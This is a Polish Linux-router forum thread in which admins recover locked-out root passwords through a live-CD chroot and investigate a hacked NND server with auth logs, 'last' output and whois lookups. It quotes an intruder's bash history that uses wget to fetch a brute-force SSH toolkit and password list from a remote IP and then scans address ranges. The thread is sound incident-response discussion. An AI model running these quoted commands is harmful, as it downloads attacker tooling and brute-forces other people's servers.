Freesco, NND, CDN, EOS

http://www.freesco.pl
Dzisiaj jest niedziela, 22 czerwca 2025, 07:29

Posty bez odpowiedzi | Aktywne tematy


Indeks witryny » NND » Instalacja i konfiguracja (NND)

Strefa czasowa UTC+2godz.




Nowy temat Odpowiedz w temacie  Strona 1 z 2
  [ Posty: 23 ]  Przejdź na stronę 1, 2  Następna
  Podgląd wydruku Poprzedni temat | Następny temat 
Autor Wiadomość
Anonymous
Post: piątek, 21 kwietnia 2006, 14:22 
jestem adminem 10 osobowej sieci... obslugiwanej przez server z oprogramowaniem linuxowym NND router jakis ktos pozmienil mi hasla asministracyjne na serwerze!!! w jaki sposób moge namiezyc dowcipnisia i jak moge odzyskac moje hasła!!! podejrzewam ze ktos namieszał w adresach kart po niektórzy nie maja internetu. ludzie siędenerwója a ja zrywam opierdziel... prosze o szybką pomoc
ps. dostalem tą sieć w spadku po poprzednim adminie i nie jestem zbyt dobry w te klocki... POMOCY!!!!
Na górę
  
 
mund
 Tytuł:
Post: piątek, 21 kwietnia 2006, 14:39 
Offline

Rejestracja: czwartek, 6 kwietnia 2006, 23:08
Posty: 30
- Odłączyc serwer od sieci,
- uruchomić z bootowalnej płyty z linuksem - może byc instalka NND
- zalogowac się,
: [/] [] ()
cd /
mkdir dysk
mount -t ext3 /dev/hda2 /dysk
chroot /dysk
mc
GeSHi © Codebox Plus


- przechodzisz do /etc
- F4 na pliku shadow
- szukasz swojej nazwy użytkownika
- kasujesz hasło, jest po pierwszym : po nazwie użytkownika
- zapisujesz plik
- wyciągasz płytkę
- restartujesz serwer
- wchodzisz na użytkownika bez podawania hasła
: [/] [] ()
passwd nazwaUzytkownika
GeSHi © Codebox Plus

- podajesz nowe hasło

a dalej ??
zależy co ktoś namieszał, musisz popatrzeć.....

Jeżeli się na tym nie znasz to lepiej weź kogoś z doświadczeniem i od nowa postawcie serwer ;)
Na górę
 Wyświetl profil  
 
Maciek
 Tytuł:
Post: piątek, 21 kwietnia 2006, 14:58 
Offline
Honorowy Admin

Rejestracja: piątek, 5 lipca 2002, 17:30
Posty: 7800
Lokalizacja: Słupsk
mund pisze:
- Odłączyc serwer od sieci,
- uruchomić z bootowalnej płyty z linuksem - może byc instalka NND
- zalogowac się,
: [/] [] ()
cd /
mkdir dysk
mount -t ext3 /dev/hda2 /dysk
chroot /dysk
mc
GeSHi © Codebox Plus


Do tego momentu było dobrze. Jednak dalej można prościej. Najpierw samą komendą passwd zmieniamy hasło roota, potem passwd user - hasło usera.
Jeśli ktoś się włamał, zapewne było łatwe słownikowe hasło. Nigdy nie robić zbyt łatwych haseł. Skoro był złośliwy i pozmieniał hasła, być może zrobił coś jeszcze. Ja bym zalecał instalkę od nowa.

_________________
Obrazek Belfer.one.PL
Obrazek Audio Cafe
Na górę
 Wyświetl profil  
 
Anonymous
 Tytuł:
Post: piątek, 21 kwietnia 2006, 15:08 
dziękuje naprawde bardzo mi pomogliście ale jeszcze jedna sprawa chodzi mi po lowie.. czy jest możliwosc namiezenia włamywacza jestem prawie pewny ze byl to ktos z mijej sieci...
Na górę
  
 
MAC!EK
 Tytuł:
Post: piątek, 21 kwietnia 2006, 15:18 
Offline
MODERATOR

Rejestracja: poniedziałek, 27 stycznia 2003, 23:39
Posty: 3065
Lokalizacja: Kraków/Częstochowa
Jedyne rozwiązanie to "czysta" instalacja od zera!

Możesz skopiować gdzieś cały system i dać komuś te pliki do przejrzenia może znajdzie coś ciekawego co pozwoli namierzyć tego kogoś.

_________________
Ten post Ci pomógł? Zaznacz go jako pomocny .
Na górę
 Wyświetl profil  
 
Maciek
 Tytuł:
Post: piątek, 21 kwietnia 2006, 15:19 
Offline
Honorowy Admin

Rejestracja: piątek, 5 lipca 2002, 17:30
Posty: 7800
Lokalizacja: Słupsk
Jeśli był cwany skasował logi. Jeśli to typowa małpa z brzytwą, logi być może zostały - sprawdź /var/log/auth (oraz starsze - te z cyferką). Szukaj połączeń ssh i logowania się na roota.

_________________
Obrazek Belfer.one.PL
Obrazek Audio Cafe
Na górę
 Wyświetl profil  
 
Mis'
 Tytuł:
Post: piątek, 21 kwietnia 2006, 15:20 
Offline
MODERATOR

Rejestracja: piątek, 5 lipca 2002, 17:31
Posty: 2449
Lokalizacja: Londyn
BZN pisze:
czy jest możliwosc namiezenia włamywacza jestem prawie pewny ze byl to ktos z mijej sieci...


jeśli nie wiesz jak zmienić hasło, to nie poradzisz sobie z analizą logów. Tym bardziej, że jeśli włamywacz miał minimum wiedzy to w logach raczej nic nie znajdziesz.

IMHO, jesli ten serwerek ma dalej działać to lepiej zainstaluj wszystko od nowa... i zrób naprawdę trudne hasła, z małymi i dużymi literami, cyframi i innymi znakami.

_________________
Mis'
___________________________________
"Real Men Use Telnet on port 80" (el bid)
Na górę
 Wyświetl profil  
 
mund
 Tytuł:
Post: sobota, 22 kwietnia 2006, 08:39 
Offline

Rejestracja: czwartek, 6 kwietnia 2006, 23:08
Posty: 30
Cytuj:

Jednak dalej można prościej. Najpierw samą komendą passwd zmieniamy hasło roota, potem passwd user - hasło usera.


Tylko przy zmianie hasła najpierw trzeba podać stare,
a jeżeli ktoś zmienił też hasło roota ??

czy w chroot przy zmianie hasła jako starego używamy hasła aktualnego roota ??
czy też starego hasła roota zapisanego w shadow w chroot??
Na górę
 Wyświetl profil  
 
Szurik
 Tytuł:
Post: sobota, 22 kwietnia 2006, 10:41 
Offline
Użytkownik

Rejestracja: wtorek, 18 kwietnia 2006, 10:58
Posty: 266
Lokalizacja: Rzeszów
Odpal NND z CD instalacyjnego i zamiast wpisywać install_nnd wpisz:
mount /dev/hda1 /mnt
chroot /mnt
passwd root
adduser nazwa użytkownika
passwd nazwa użytkownika
exit
umount /dev/hda1
reboot
Uruchom NND normalnie


Nie potrzebne jest stare haslo roota rub wedle instrukcji tylko wylacz serwer od internetu !

_________________
AMD Se 2600+ / HDD: 80Gb / DDR 512Mb / Neo 6Mb/s / 25 maszyn
Na górę
 Wyświetl profil  
 
mund
 Tytuł:
Post: sobota, 22 kwietnia 2006, 20:59 
Offline

Rejestracja: czwartek, 6 kwietnia 2006, 23:08
Posty: 30
Szurik pisze:
Odpal NND z CD instalacyjnego i zamiast wpisywać install_nnd wpisz:
mount /dev/hda1 /mnt


a /dev/hda1 to nie jest przypadkiem partycja boot ??
plik shadow jest w /dev/hda2
przynajmniej podczas standardowej instalacji...

i po co ma dodawać nowego użytkownika ??
przecież trzeba zmienić hasła użytkownika z dostępem do konsoli i roota
Na górę
 Wyświetl profil  
 
tasiorek
 Tytuł:
Post: sobota, 22 kwietnia 2006, 23:44 
Offline
MODERATOR

Rejestracja: sobota, 30 lipca 2005, 14:08
Posty: 3984
Lokalizacja: Rzeszów
mund, Szurik skopiowal uniwersalne rozwiazanie z faq. Dziala w przypadku zmiany hasla na roota i nie zalozenia innego uzytkownika podczas instalacji.

_________________
FAQ dla NND: http://nnd-linux.pl/faq.php
Doswiadczenie, to cos, co zdobywasz tuz po chwili w ktorej go potrzebowales.
Na górę
 Wyświetl profil  
 
mund
 Tytuł:
Post: niedziela, 23 kwietnia 2006, 20:19 
Offline

Rejestracja: czwartek, 6 kwietnia 2006, 23:08
Posty: 30
OK,
nie chciałem się czepiać...

BTW tak się zastanawiałem, czy jest możliwe takie ustawienie systemu aby każdy nowo założony użytkownik odpalał się w chroot ??

Bo to by było ciekawe :D
Na górę
 Wyświetl profil  
 
Jurzikowianka
 Tytuł:
Post: poniedziałek, 20 listopada 2006, 16:48 
Offline

Rejestracja: środa, 14 stycznia 2004, 15:54
Posty: 65
Witam serdecznie!!

Mam zwiazany z tematem problem więc podlączam sie , żeby nei zaśmiecać :)

Dzisiaj zadzwonił do mnie gościu (gdzieś z drugiego końca polski) z Sądu Rejonowego , z informacją, że z mojego serwera była próba włamania na ich serwer. No i tam zaczął mnie starszyc ,że jeżeli nie przerwie tego to tam od prokuratowa mi zaczął itd ale nei o tym rzecz...
Więc wystraszony patrze na serwer, ale hasło root'a nei zostało złamane (dla pewności odrazu zmieniłem) tylko zauwazyłem że ktoś znalazł hasło dla usera "ADMIN" (na początku załozony nei używany nawet zapomniałem jakie tam było hasło) w katalogu domowym "ADMINA" bardzo dużo dziwnych pliczków nawet *takich, skopiowałem cały katalog "ADMIN"do windowsa (przy okazji nod-32 kilka razy alarmował i przeniósł do kwarantanny)
usunąłem "ADMIN" w konsoli.
CO musze więcej zrobić, żeby jakoś serwerek przeżył bez ponownej instalki ??


W /var/log/auth sprawdziłem ,że IP na który niby sie włamywałem istnieje ale wg mnie to stamtąd sie ktos włamywał , czy nie tak ??
: [/] [] ()
Nov 19 18:14:18 router sshd[24431]: Failed password for root from 83.16.174.118 port 2570 ssh2
Nov 19 18:14:19 router sshd[24431]: Excess permission or bad ownership on file /var/log/btmp
Nov 19 18:14:22 router sshd[24431]: Failed password for root from 83.16.174.118 port 2570 ssh2
Nov 19 18:14:22 router sshd[24431]: Excess permission or bad ownership on file /var/log/btmp
Nov 19 18:14:30 router sshd[24431]: Failed password for root from 83.16.174.118 port 2570 ssh2
Nov 19 18:14:30 router sshd[24431]: Excess permission or bad ownership on file /var/log/btmp
Nov 19 18:14:34 router sshd[24431]: Failed password for root from 83.16.174.118 port 2570 ssh2
Nov 19 18:14:34 router sshd[24431]: Excess permission or bad ownership on file /var/log/btmp
Nov 19 18:14:37 router sshd[24431]: Failed password for root from 83.16.174.118 port 2570 ssh2
Nov 19 18:14:37 router sshd[24431]: Excess permission or bad ownership on file /var/log/btmp
Nov 19 18:14:40 router sshd[24431]: Failed password for root from 83.16.174.118 port 2570 ssh2
Nov 19 18:14:40 router sshd[24431]: Excess permission or bad ownership on file /var/log/btmp
GeSHi © Codebox Plus


tylko tyle o tym IP znalazłem gdzie jeszcze może być cos zapisane ??

Bardzo proszę o sugestie gdyż mam pierwszy taki przypadek i troszke sie boje a nie mam (za dużo ) wiedzy na ten temat ;)

Z góry dziękuje serdecznie

pozdrowionka

_________________
Byle do przodu !!

Jak pomóc swojemu dziecku osiągnąć sukces?
http://dziecko.zlotemysli.pl/jurzikowianka.php


Ostatnio zmieniony poniedziałek, 20 listopada 2006, 22:17 przez Jurzikowianka, łącznie zmieniany 1 raz

Na górę
 Wyświetl profil  
 
tasiorek
 Tytuł:
Post: poniedziałek, 20 listopada 2006, 16:53 
Offline
MODERATOR

Rejestracja: sobota, 30 lipca 2005, 14:08
Posty: 3984
Lokalizacja: Rzeszów
Sum md5 binarek raczej nie masz, wiec ratuje Cie tylko reinstalka NND.

_________________
FAQ dla NND: http://nnd-linux.pl/faq.php
Doswiadczenie, to cos, co zdobywasz tuz po chwili w ktorej go potrzebowales.
Na górę
 Wyświetl profil  
 
MAC!EK
 Tytuł:
Post: poniedziałek, 20 listopada 2006, 17:07 
Offline
MODERATOR

Rejestracja: poniedziałek, 27 stycznia 2003, 23:39
Posty: 3065
Lokalizacja: Kraków/Częstochowa
wpisz last i zobaczysz kto się ostatnio logował... zapisz te logi gdzieś na dysk i je zabezpiecz, zdobądź od tego gościa co dzwonił namiar i powiedz że możesz mu udostępnić logi kto się do nich włamał, tzn z jakiego IP czy coś... powinni się odczepić i pomożesz im na pewno znaleźć sprawcę.

_________________
Ten post Ci pomógł? Zaznacz go jako pomocny .
Na górę
 Wyświetl profil  
 
Jurzikowianka
 Tytuł:
Post: poniedziałek, 20 listopada 2006, 22:12 
Offline

Rejestracja: środa, 14 stycznia 2004, 15:54
Posty: 65
MAC!EK pisze:
wpisz last i zobaczysz kto się ostatnio logował... zapisz te logi gdzieś na dysk i je zabezpiecz, zdobądź od tego gościa co dzwonił namiar i powiedz że możesz mu udostępnić logi kto się do nich włamał, tzn z jakiego IP czy coś... powinni się odczepić i pomożesz im na pewno znaleźć sprawcę.


Zrobiłem jak mówisz i mam cos takiego:
: [/] [] ()
[jurzikowianka@router ~]$ last
jurzikow pts/0        piekarnia_1      Mon Nov 20 21:04   still logged in
jurzikow pts/0        piekarnia_1      Mon Nov 20 14:58 - 15:52  (00:53)
biuro    pts/0        piekarnia_1      Mon Nov 20 14:32 - 14:58  (00:26)
jurzikow pts/0        piekarnia_1      Mon Nov 20 13:12 - 14:31  (01:18)
jurzikow pts/0        sklep            Mon Nov 20 12:42 - 12:46  (00:03)
admin    pts/0        pool-71-247-232- Sun Nov 19 00:34 - 20:21  (19:47)
jurzikow pts/0        piekarnia_1      Sat Nov 18 18:08 - 18:11  (00:03)
jurzikow pts/0        piekarnia_1      Mon Nov 13 21:06 - 21:38  (00:32)
admin    pts/0        pool-71-247-237- Sun Nov 12 21:43 - 21:48  (00:05)
admin    pts/0        pool-71-247-237- Wed Nov  8 02:01 - 02:02  (00:01)
admin    pts/0        pool-71-247-237- Wed Nov  8 01:45 - 01:46  (00:00)
jurzikow pts/0        piekarnia_1      Tue Nov  7 15:50 - 20:35  (04:45)
reboot   system boot  2.4.32-6nnd      Tue Nov  7 14:17         (13+06:48)
reboot   system boot  2.4.32-6nnd      Tue Nov  7 11:34         (13+09:30)
admin    pts/1        pool-71-247-228- Sun Nov  5 04:47 - 04:54  (00:06)
jurzikow pts/1        piekarnia_1      Thu Nov  2 16:37 - 16:40  (00:02)
jurzikow pts/1        piekarnia_1      Wed Nov  1 19:56 - 20:00  (00:04)
jurzikow pts/1        master           Wed Nov  1 19:13 - 19:29  (00:16)
jurzikow pts/1        master           Wed Nov  1 14:44 - 14:47  (00:03)
jurzikow pts/0        master           Wed Nov  1 01:35 - 01:44  (00:08)

wtmp begins Wed Nov  1 01:35:23 2006
[jurzikowianka@router ~]$
GeSHi © Codebox Plus

Chodzi o tego admina, ale jak z tego odczytać IP ?? jest jakby niekompletne...
namiary do gościa mam bo dzwonił do mnie na komorke napewno jutro do niego zadzwonie, ale nurtuje mnie jeszcze to czy musze koniecznie reinstall systemu robić jak pisze tasiorek ?? czy teraz jak usunąłem konto admina dalej jest zagrożenie ?? Ja mam cały ten katalog admin u siebie na kompie może by potrafił ktoś cos z tego odczytać...
a nigdzie nie jest zapisywane co robi user na serwerze??

_________________
Byle do przodu !!

Jak pomóc swojemu dziecku osiągnąć sukces?
http://dziecko.zlotemysli.pl/jurzikowianka.php
Na górę
 Wyświetl profil  
 
Szurik
 Tytuł:
Post: poniedziałek, 20 listopada 2006, 22:13 
Offline
Użytkownik

Rejestracja: wtorek, 18 kwietnia 2006, 10:58
Posty: 266
Lokalizacja: Rzeszów
inetnum: 83.16.174.112 - 83.16.174.119
netname: LUBELSKIECI
descr: LUBELSKIE CENTRUM INFORMATYCZNE
descr: BILGORAJ
descr: POLAND

Reverse DNS: ags118.internetdsl.tpnet.pl

_________________
AMD Se 2600+ / HDD: 80Gb / DDR 512Mb / Neo 6Mb/s / 25 maszyn
Na górę
 Wyświetl profil  
 
Jurzikowianka
 Tytuł:
Post: poniedziałek, 20 listopada 2006, 22:21 
Offline

Rejestracja: środa, 14 stycznia 2004, 15:54
Posty: 65
Tylko to IP
: [/] [] ()
83.16.174.118
GeSHi © Codebox Plus

to jest od gościa który do mnei dzwonił, że niby ja sie do neigo włamuje... więc ja juz wogole nic nie wiem,...\
a na admina ktoś sie logował z tego IP
: [/] [] ()
Nov 19 00:34:17 router sshd[2108]: Accepted password for admin from 71.247.232.28 port 50177 ssh2
GeSHi © Codebox Plus

_________________
Byle do przodu !!

Jak pomóc swojemu dziecku osiągnąć sukces?
http://dziecko.zlotemysli.pl/jurzikowianka.php
Na górę
 Wyświetl profil  
 
MAC!EK
 Tytuł:
Post: poniedziałek, 20 listopada 2006, 22:58 
Offline
MODERATOR

Rejestracja: poniedziałek, 27 stycznia 2003, 23:39
Posty: 3065
Lokalizacja: Kraków/Częstochowa
Historia poleceń zapisywana jest w .bash_history w katalogu domowym danego usera, ale nie koniecznie muszą tam być wszystkie polecenia bo da się to obejść.
Pamiętaj że usunięcie katalogu domowego nie gwarantuje że się nikt na niego nie zaloguje.

_________________
Ten post Ci pomógł? Zaznacz go jako pomocny .
Na górę
 Wyświetl profil  
 
Jurzikowianka
 Tytuł:
Post: poniedziałek, 20 listopada 2006, 23:41 
Offline

Rejestracja: środa, 14 stycznia 2004, 15:54
Posty: 65
a więc w .bash_history (admina) jest tylko cos takiego:
: [/] [] ()
cd /tmp
ls
rm -rf *
wget http://71.247.232.28:1831/gsm.gz
tar zxvf gsm.gz
cd gsm
rm -rf pass_file
wget http://71.247.232.28:1831/aaaa.txt
mv aaaa.txt pass_file
chmod 777 *
clear
./assh 83.16
./assh 212.85 ; ./assh 212.86 ; ./assh 212.8 ; ./assh 24.128
GeSHi © Codebox Plus


O tym ,że po usuniąciu katalogu domowego mozna sie na usera zalogować nie wiedziałem (dzięki za nauke ;) )
ja jednak zmieniłem hasło dla admina na mam nadzieja "bardziej skomplikowane" !!
Czyli mam rozumieć ,że nie da sie cakowicie usunąć usera jeżeli sie go raz dodalo ??

Serdecznie dziekuję za okazaną mi uwagę!!!

pozdrowionka

_________________
Byle do przodu !!

Jak pomóc swojemu dziecku osiągnąć sukces?
http://dziecko.zlotemysli.pl/jurzikowianka.php
Na górę
 Wyświetl profil  
 
Wyświetl posty nie starsze niż:  Sortuj wg  
Nowy temat Odpowiedz w temacie  Strona 1 z 2
  [ Posty: 23 ]  Przejdź na stronę 1, 2  Następna

Indeks witryny » NND » Instalacja i konfiguracja (NND)

Strefa czasowa UTC+2godz.


Kto jest online

Użytkownicy przeglądający to forum: Obecnie na forum nie ma żadnego zarejestrowanego użytkownika i 3 gości

Nie możesz tworzyć nowych tematów
Nie możesz odpowiadać w tematach
Nie możesz zmieniać swoich postów
Nie możesz usuwać swoich postów
Nie możesz dodawać załączników

Szukaj:
Przejdź do:  
cron
Technologię dostarcza phpBB® Forum Software © phpBB Group
Hosting: Compus-Net
RobertKonik.pl